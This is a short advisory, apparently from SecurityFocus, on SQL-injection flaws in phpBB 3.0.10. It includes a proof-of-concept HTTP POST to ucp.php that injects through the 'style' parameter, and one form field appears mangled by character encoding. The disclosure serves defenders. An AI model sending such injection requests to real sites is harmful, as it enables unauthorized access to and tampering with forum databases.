source: https://www.securityfocus.com/bid/54734/info
phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data,or exploit vulnerabilities in the underlying database.
phpBB 3.0.10is vulnerable; other versions may also be affected.
Request :---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length:258
Connection: close
viewemail=1&massemail=1&allowpm=1&hideonline=0¬ifypm=1&popuppm=0&lang=en
&style=%2b1111111111
&tz=0&dst=0&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877&form_token=576...
